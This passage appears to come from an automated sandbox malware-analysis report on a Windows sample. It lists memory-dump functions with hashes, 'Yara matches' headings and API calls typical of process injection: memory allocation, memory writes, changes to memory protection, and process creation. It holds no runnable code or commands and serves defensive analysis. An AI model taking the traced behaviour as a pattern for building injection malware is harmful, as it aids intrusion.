                                                • Instruction ID: df0dce4cf96caf90387f9b405075dbedc6e07ee5db067ec6a10438a5a3779e0e
                                                • Opcode Fuzzy Hash: d9787cf0d71b0521727d5a11e5939b6a35262b394bd27761efadde1e4e79b30b
                                                • Instruction Fuzzy Hash: 7071F135628249CFCB35CEA8C9D97DA3BB2BF1A314F41015ACC099F359C7719A01CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a51f5f99a6b525514fe3e36683850489bce34991d84d8bd8eee70217794a600c
                                                • Instruction ID: a3641fcf9b6a82d5f7126d5170abbe4017a986ea2c94b1c5b3264684f3c93d8e
                                                • Opcode Fuzzy Hash: a51f5f99a6b525514fe3e36683850489bce34991d84d8bd8eee70217794a600c
                                                • Instruction Fuzzy Hash: CE610135628248CFCB25CEA8C9997DA3BB2BF16310F45015ACC099F359D771DA02CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ec031a934e939def9ae5acf742c82f0d963b4cb4aaffec4d1ec1f35e8830a528
                                                • Instruction ID: 9ecc6b735744c542a355f1ba6f1edfe1a0c85e86ea740dac82e0580e6b686cfc
                                                • Opcode Fuzzy Hash: ec031a934e939def9ae5acf742c82f0d963b4cb4aaffec4d1ec1f35e8830a528
                                                • Instruction Fuzzy Hash: B1610335628249DFCF25CEA8C9997D63BB1BF16310F45015ACC099F359D7719A02CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a41edb7b7c99e81f68b9f8b03a05e8635410bd14bbe6adb0a1145edd7df6334c
                                                • Instruction ID: 3710d0e77a51b38a3e3fd4cb4a619c426a92234f3b8e0f8d7bf7b5c06d45c919
                                                • Opcode Fuzzy Hash: a41edb7b7c99e81f68b9f8b03a05e8635410bd14bbe6adb0a1145edd7df6334c
                                                • Instruction Fuzzy Hash: C4611435628349CFCB25CEA8C9957DA3BB1BF16314F45015ACC099F359D7719A02CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(DA131614), ref: 02278528
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: d3ff1ffbe3cf4359c81e11bd293bb367816da28b099d96077165bcddc91cdfe1
                                                • Instruction ID: ab6e481936060e8977a42c4141f3319d2720381aa94e49be27b5377572e02eb8
                                                • Opcode Fuzzy Hash: d3ff1ffbe3cf4359c81e11bd293bb367816da28b099d96077165bcddc91cdfe1
                                                • Instruction Fuzzy Hash: 5E51AA725583498FDF30CE78CC987EA77A2EF9A350F55412ADC889B218D3708A06DF52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fde0354bda0b121a2367c56dc367d1f450599c66c5e1f5d48684953ff478b0ad
                                                • Instruction ID: f329600b6543d2871685c16592765fedb589b32705bf0c5c5ab635b37a7c16ad
                                                • Opcode Fuzzy Hash: fde0354bda0b121a2367c56dc367d1f450599c66c5e1f5d48684953ff478b0ad
                                                • Instruction Fuzzy Hash: F2510336624649CFCB25CEA8C9D97D63BB2BF16310F45015ACC099F359D771DA02CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 83da7eca4c2a84be955a88384c04ff79b5c06a888a8cb8de745b77c023a4ed5c
                                                • Instruction ID: 571f0d4535d18e1fbc35dde966c1f3c3d0b11abe5d2e27d0343ed95d6a778a58
                                                • Opcode Fuzzy Hash: 83da7eca4c2a84be955a88384c04ff79b5c06a888a8cb8de745b77c023a4ed5c
                                                • Instruction Fuzzy Hash: 6A511535624349CFCB25CFA8C9997D63BB2BF16314F45015ACC099F359D7719A02CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(DA131614), ref: 02278528
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: 037afa289f3a5024413561829b7df14947c5a1e276a2739817df0a3d4bb205e7
                                                • Instruction ID: e39e5c6e5b0e65fe6835dac25227fcf1fc52242e8a946ee0110dfe88496d4e69
                                                • Opcode Fuzzy Hash: 037afa289f3a5024413561829b7df14947c5a1e276a2739817df0a3d4bb205e7
                                                • Instruction Fuzzy Hash: 4F5134754483888FDB218F28CC993D97BE2AF5B754F0A0159CC885B225D771490BDF93
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(DA131614), ref: 02278528
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: 932d201b6cf3e3a2c9bd02ce45119073c30ef3221c160f39095771b77e5998e5
                                                • Instruction ID: c57f62be0b0ae3aca87d15bfbe3609038ceb28fb49991956a8c49cc12bd171ea
                                                • Opcode Fuzzy Hash: 932d201b6cf3e3a2c9bd02ce45119073c30ef3221c160f39095771b77e5998e5
                                                • Instruction Fuzzy Hash: C3519775558288CFDF208F68CC857DA7BA2FF9A354F564119CC889B314D3718A06DF92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtWriteVirtualMemory.NTDLL(?,946127F0,?,00000000,?), ref: 022777E0
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MemoryVirtualWrite
                                                • String ID:
                                                • API String ID: 3527976591-0
                                                • Opcode ID: 5e4d6d40ae358ca99ec936dce49f93d6d363eac1a3d3ecd709d0b82b4c1998f4
                                                • Instruction ID: 6ba96f29b73e33fecbc15b5d744db4854ac5685b3952495a40b5f160335cd184
                                                • Opcode Fuzzy Hash: 5e4d6d40ae358ca99ec936dce49f93d6d363eac1a3d3ecd709d0b82b4c1998f4
                                                • Instruction Fuzzy Hash: 3351CD75919288DFCF358F78CC85BD9BBB2FF09300F45001AD9489B225CB719A56CB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 003a8edd6f01f03f3f9c6bf8558138a1b812c502f0f7a2df1abb381f682eb362
                                                • Instruction ID: 481c81b9f6da75d782748bb1a844660c310127e98703c83bfc54335128010648
                                                • Opcode Fuzzy Hash: 003a8edd6f01f03f3f9c6bf8558138a1b812c502f0f7a2df1abb381f682eb362
                                                • Instruction Fuzzy Hash: 4B51E132624249DFCB35DEA8C9D87EA3BB2BF56310F40412ACC0A9B359D771DA41CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtWriteVirtualMemory.NTDLL(?,946127F0,?,00000000,?), ref: 022777E0
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MemoryVirtualWrite
                                                • String ID:
                                                • API String ID: 3527976591-0
                                                • Opcode ID: ff569479804c31544b6eb60e26731c957ba01aa915667db60bd89770cff38353
                                                • Instruction ID: e9dccc7769d39cc9a93ad3aef59b96830b9b86f5956fb6767042d761b1c2ecf6
                                                • Opcode Fuzzy Hash: ff569479804c31544b6eb60e26731c957ba01aa915667db60bd89770cff38353
                                                • Instruction Fuzzy Hash: 8B51CD75519288DFCF359F78CC86BD97BB2FF09300F44401ADA489B225CB719A55CB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(DA131614), ref: 02278528
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: ac2fc24b255f1f225d49b431f58cfadeb59d3651042e8fbabca3ca0e38634542
                                                • Instruction ID: 806933d6f0d6651ce663d5d49d4ff648fd68bb1149ec7daefabcba5614d7a31f
                                                • Opcode Fuzzy Hash: ac2fc24b255f1f225d49b431f58cfadeb59d3651042e8fbabca3ca0e38634542
                                                • Instruction Fuzzy Hash: 1D4145B54483888FEF20CF29CC857D97BE2EF9A354F160119CC885B265D7718A06DF52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtWriteVirtualMemory.NTDLL(?,946127F0,?,00000000,?), ref: 022777E0
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MemoryVirtualWrite
                                                • String ID:
                                                • API String ID: 3527976591-0
                                                • Opcode ID: c7fc8d6a0d34b4ec4786d86f767c8e3b982fc001a800c69b23410291a859fe3e
                                                • Instruction ID: cccbac46789cbaac6255f7ec5eddc1c8f6d0e5e92d2637626cec0ce61ac37438
                                                • Opcode Fuzzy Hash: c7fc8d6a0d34b4ec4786d86f767c8e3b982fc001a800c69b23410291a859fe3e
                                                • Instruction Fuzzy Hash: 7141DE75959288DFCF259F68CC86BD97BA1FF0E300F440156EA489B225CB314A16DF92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateFileA.KERNELBASE(0000D1B7,2E806EBE), ref: 02278127
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 34b5ccfd16e43f9e7b461b8562ffee9768d9eace3f035cd0d9ce65996a844d73
                                                • Instruction ID: cfce50f64a70a92b5317da19d4015d9f585b1fbce1fc7a36fd754ac37cddd6bb
                                                • Opcode Fuzzy Hash: 34b5ccfd16e43f9e7b461b8562ffee9768d9eace3f035cd0d9ce65996a844d73
                                                • Instruction Fuzzy Hash: 5D31CB398183058FEB18AF34C9062D6BBE2FF62784F86064DC9845B218C7714946CF93
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9a30f993026eefe70f0a5345b3c8a48e7e5c75731eb67883d8cbe115e2bcb035
                                                • Instruction ID: 7a0f2a528545a1cbd7c2c613618de5fdf0442328b6dd42deb30e16f76bc8020e
                                                • Opcode Fuzzy Hash: 9a30f993026eefe70f0a5345b3c8a48e7e5c75731eb67883d8cbe115e2bcb035
                                                • Instruction Fuzzy Hash: 2831AD75229346DFCB35DF98C994BEE33A1FF49320F00803AE94A8B218D7749A40CB11
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 11e82afc48991c5da88491074d63946ddb092e3448f364409c192ec31bd7a0f2
                                                • Instruction ID: 86de266dacbf55785d76178364c8a2ad5444c6bc9073389cc4b898ce04350c9d
                                                • Opcode Fuzzy Hash: 11e82afc48991c5da88491074d63946ddb092e3448f364409c192ec31bd7a0f2
                                                • Instruction Fuzzy Hash: 34F0243A1181845ECB019EB8D482786BBD8AFA33147A85184C8D14B06ADA75D502CFE2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtProtectVirtualMemory.NTDLL ref: 0227CB51
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MemoryProtectVirtual
                                                • String ID:
                                                • API String ID: 2706961497-0
                                                • Opcode ID: 143cec6cb2dd2c5e9a45129ada6bf0d57a02bb282743625b1a5ea9a5a9a99ed0
                                                • Instruction ID: 95495026e8e24dc104026ba35bb2735d86f7cf5f397fc8a43bc7b63c15142c2c
                                                • Opcode Fuzzy Hash: 143cec6cb2dd2c5e9a45129ada6bf0d57a02bb282743625b1a5ea9a5a9a99ed0
                                                • Instruction Fuzzy Hash: DBE0D83D55AA848DCF01CA58C59B580BF90AE1795438A12C0C2201F326DE72992BEEF3
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtProtectVirtualMemory.NTDLL ref: 0227CB51
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MemoryProtectVirtual
                                                • String ID:
                                                • API String ID: 2706961497-0
                                                • Opcode ID: 13dc4c4d8e8051dd5b11390641ecd8eba5409ef7b3f6b5a553902e1e786b9066
                                                • Instruction ID: 407dc1cccd2d27b7953a6c8af5915d6afcbda4eb8d0040efb4aa2e20d9bf7837
                                                • Opcode Fuzzy Hash: 13dc4c4d8e8051dd5b11390641ecd8eba5409ef7b3f6b5a553902e1e786b9066
                                                • Instruction Fuzzy Hash: 81F0EC716142849FDB34DE69C999AEE77E6FBC8300F148529E9499B204D770AF00CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • TerminateProcess.KERNELBASE(-325AD4C3), ref: 02277DA5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: ProcessTerminate
                                                • String ID: GI'B
                                                • API String ID: 560597551-450599694
                                                • Opcode ID: 6d3661bcabdada9e71e2e3550733253667383071f2db526cd076bea2d7996896
                                                • Instruction ID: 56388aa601028c42cb3e64a594b10221d61a3ecd9a6159b99ab86e6e90cf9437
                                                • Opcode Fuzzy Hash: 6d3661bcabdada9e71e2e3550733253667383071f2db526cd076bea2d7996896
                                                • Instruction Fuzzy Hash: F0116A75018AC69BC722EA28884A79BFFB1BF86314F44C689C4445B25ADB304101C782
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238038167140.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000002.00000002.238038120792.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.238038419710.0000000000423000.00000004.00020000.sdmp Download File
                                                • Associated: 00000002.00000002.238038485259.0000000000426000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: #100
                                                • String ID: VB5!6&*
                                                • API String ID: 1341478452-3593831657
                                                • Opcode ID: 7b1a76c332887b91199b04cafa039e9114888b9a0caa35bb048b1a9f825c8645
                                                • Instruction ID: eca36ad3341b39b6f8191c893ce71dd04855fd79c9a11be9aa4403621963bba4
                                                • Opcode Fuzzy Hash: 7b1a76c332887b91199b04cafa039e9114888b9a0caa35bb048b1a9f825c8645
                                                • Instruction Fuzzy Hash: C3E024A144F3D10FD30797759C26586BF70AD2326030E05EBD0CADB4E3C96E184AC762
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateProcessInternalW.KERNELBASE ref: 0227D5B1
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInternalProcess
                                                • String ID:
                                                • API String ID: 2186235152-0
                                                • Opcode ID: 8f11067599dff809047ab5934e6ba828040ab97080ecff2a0f078f9254f8e272
                                                • Instruction ID: b8fb5c1b4e8ebb10dead6b3b9620a3f159146a8b32c410d68450b4fd5462d045
                                                • Opcode Fuzzy Hash: 8f11067599dff809047ab5934e6ba828040ab97080ecff2a0f078f9254f8e272
                                                • Instruction Fuzzy Hash: 99510035624649DFCF258EA8C9D97DA3BB1BF1A324F450156CC089F358CB719A02CFA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateProcessInternalW.KERNELBASE ref: 0227D5B1
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInternalProcess
                                                • String ID:
                                                • API String ID: 2186235152-0
                                                • Opcode ID: 3a35eb3528416c7081e731b8676f624ff842b681935ae08b565a670bcb20e335
                                                • Instruction ID: 3d0d4f297ae7f03dd0958f9237cefcf8a21fb5684319f4747e0e320eaa1d6fb2
                                                • Opcode Fuzzy Hash: 3a35eb3528416c7081e731b8676f624ff842b681935ae08b565a670bcb20e335
                                                • Instruction Fuzzy Hash: 1541E331528248DFCF25CEA8D9D57DA3B62BF4A324F40415ACC085F259CB319A42CF62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateProcessInternalW.KERNELBASE ref: 0227D5B1
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInternalProcess
                                                • String ID:
                                                • API String ID: 2186235152-0
                                                • Opcode ID: ba419dc680036885fa2ee6a4765b5c1dee399431f87ecb0e6525bb8c468f7fcf
                                                • Instruction ID: 10fcdca93d091b368c762328bcd2425bb029f3f07662732acd2ee35c65ef08ee
                                                • Opcode Fuzzy Hash: ba419dc680036885fa2ee6a4765b5c1dee399431f87ecb0e6525bb8c468f7fcf
                                                • Instruction Fuzzy Hash: 6841DF72624649DFCB35DEA8CDD87EA3B72BF5A320F40411ACC099B258D7319A41CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 24a59d85e7737b568d049d398db7c07e667c93f9e583274b45d1959874c615f0
                                                • Instruction ID: 7a7542ccbeda9ebc332b7245ce0332ab0a27afdef9ffbd047d284de54c705c7e
                                                • Opcode Fuzzy Hash: 24a59d85e7737b568d049d398db7c07e667c93f9e583274b45d1959874c615f0
                                                • Instruction Fuzzy Hash: A731F17567C74ADBDB31AEC48D817ED3766AF463A0F000035DD8A4A25DE3B14A45CB42
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateProcessInternalW.KERNELBASE ref: 0227D5B1
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInternalProcess
                                                • String ID:
                                                • API String ID: 2186235152-0
                                                • Opcode ID: 99ecfdc5c385d6b4a6f35d9ac701827dc098f2d881f068118526104f3ea91002
                                                • Instruction ID: 67dbf3b3a0e52c8b4514bd50fe014eee63bedd49d38ec351c3658bc68b4893f0
                                                • Opcode Fuzzy Hash: 99ecfdc5c385d6b4a6f35d9ac701827dc098f2d881f068118526104f3ea91002
                                                • Instruction Fuzzy Hash: 80210035614289DFCF29CE58D9E67DA3B62AF47324F810249CC190F258CB319A42CFA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryA.KERNELBASE(C7797899), ref: 0227A75F
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 920eeae579014279b4934703448bb9bb0a142801afd5b3eed3b01265043347bf
                                                • Instruction ID: ca5540395c2a479208063eb775030a30c1e3d73d4e09084665e6378636531811
                                                • Opcode Fuzzy Hash: 920eeae579014279b4934703448bb9bb0a142801afd5b3eed3b01265043347bf
                                                • Instruction Fuzzy Hash: FC11EE3815C78ADFDF219F94D892BEC3B60EF06764F404165DA591F219C7715A02CF92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2b2c61dbdf97bda318018df76b8ee53d165b4950176d21bb0939f0decb37c4cf
                                                • Instruction ID: 8ccadc0dc6d436be36663bf4ae31a4858bd353f436bd3fba1e4ee2a38a3479b6
                                                • Opcode Fuzzy Hash: 2b2c61dbdf97bda318018df76b8ee53d165b4950176d21bb0939f0decb37c4cf
                                                • Instruction Fuzzy Hash: 8A11C17822C34BEFDF31AE8489A07ED3665EF453B4F508139DD4A4A148D3B50A41CB01
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • TerminateProcess.KERNELBASE(-325AD4C3), ref: 02277DA5
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: ProcessTerminate
                                                • String ID:
                                                • API String ID: 560597551-0
                                                • Opcode ID: 30e7df131dd4b819c09982eca7c3bbdf70afd7ebbca9ec221741486aa461fefe
                                                • Instruction ID: 7cc403f185f3cb4c0c9bb243faffe1395b2fca48b51de258cc51911359e61e58
                                                • Opcode Fuzzy Hash: 30e7df131dd4b819c09982eca7c3bbdf70afd7ebbca9ec221741486aa461fefe
                                                • Instruction Fuzzy Hash: 1C11213C1096498FDB10DE29C49A685BFD0EF8B685F499680C9001F325DE708603CFE3
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateProcessInternalW.KERNELBASE ref: 0227D5B1
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInternalProcess
                                                • String ID:
                                                • API String ID: 2186235152-0
                                                • Opcode ID: fa64efc0898ae0758c565d68f37758be835f679a15793d87c61569f6655fddc3
                                                • Instruction ID: 00d272e02eabd2a23508b13d41d76b68db4791f04939e2ebb1c6075385260dc5
                                                • Opcode Fuzzy Hash: fa64efc0898ae0758c565d68f37758be835f679a15793d87c61569f6655fddc3
                                                • Instruction Fuzzy Hash: F301F73C199688CECF168E68C9AB3C07F51AF076A4B451280C9101F355CF72980BDEE3
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateFileA.KERNELBASE(0000D1B7,2E806EBE), ref: 02278127
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 1a54bcf8e012d621a49501ad146e5dfb63a9d9dc369c400fcd430e4766943665
                                                • Instruction ID: e1a9cc2ab1aef9dfb8b5eb7d731f3b3c2c551dc5c27d08c808319a77d51b1acd
                                                • Opcode Fuzzy Hash: 1a54bcf8e012d621a49501ad146e5dfb63a9d9dc369c400fcd430e4766943665
                                                • Instruction Fuzzy Hash: 16113274919352CFEB68BF74C8047EABBA2FF21350F414A0EC9C256118D3704980CB47
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryA.KERNELBASE(C7797899), ref: 0227A75F
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 187f275e19aa2571e4a8ecb1c16923fa80790abfa76b356713722947474f57e1
                                                • Instruction ID: c61f8e3306ac66de277e85a23e5118c08ad4e7e82aca92f0d682601a94877c50
                                                • Opcode Fuzzy Hash: 187f275e19aa2571e4a8ecb1c16923fa80790abfa76b356713722947474f57e1
                                                • Instruction Fuzzy Hash: 8701817426C39BEBDF326FA4D990BEC3771EF45764F404179D9598E148C3B41A018B02
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • TerminateProcess.KERNELBASE(-325AD4C3), ref: 02277DA5
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: ProcessTerminate
                                                • String ID:
                                                • API String ID: 560597551-0
                                                • Opcode ID: 55f3d56b409931cf0e8585ea8cd5b93068473410e60f9646e2312c39b291bea8
                                                • Instruction ID: 43c75a2d0ad823bb3b19c4b8045c369db85c59904c6b4761c731b19d737734aa
                                                • Opcode Fuzzy Hash: 55f3d56b409931cf0e8585ea8cd5b93068473410e60f9646e2312c39b291bea8
                                                • Instruction Fuzzy Hash: 550178714192AAEFDB32DF388805ADB7FF4FF89220F508D59D884EB212DA304601C782
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateFileA.KERNELBASE(0000D1B7,2E806EBE), ref: 02278127
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: d28bd673eeb6e8cdc5e04ced1f4e9a64c5c530f275c16c71703c399a55cdadec
                                                • Instruction ID: dc99ee295d1910f8c95c86bc6dc974b4b605bff187f793aef14057c8c4313834
                                                • Opcode Fuzzy Hash: d28bd673eeb6e8cdc5e04ced1f4e9a64c5c530f275c16c71703c399a55cdadec
                                                • Instruction Fuzzy Hash: 79F0BE709293529BDB297F30C801BEABBA0FB113A0F46095ED8C666214D2704580CB46
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 2w\$:<1n$GI'B$K~|J
                                                • API String ID: 0-3929196425
                                                • Opcode ID: 567c528ac2e2d03fb0c031721c4f4aedcf6e2010dd43cb8088599ae2e6f07c45
                                                • Instruction ID: 7f352c33ca014808838c0ee690468e6f3e01d28032253cba96db26fb2248d579
                                                • Opcode Fuzzy Hash: 567c528ac2e2d03fb0c031721c4f4aedcf6e2010dd43cb8088599ae2e6f07c45
                                                • Instruction Fuzzy Hash: 97D1773985D7898FCB25CE68C85A2D07FA0EF17254F491299C8900F252DB729917CFE3
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 7ON_$h~a$j\u
                                                • API String ID: 0-3839618161
                                                • Opcode ID: 8fbdfd699491ee2e67a18d50d58e54dc78a9666551b0eff708b7669f0730cfa7
                                                • Instruction ID: b06ea5cabdaee89f3ea9f38c2b935c02e9114ca74dc5026f2682c1fa2645a2c8
                                                • Opcode Fuzzy Hash: 8fbdfd699491ee2e67a18d50d58e54dc78a9666551b0eff708b7669f0730cfa7
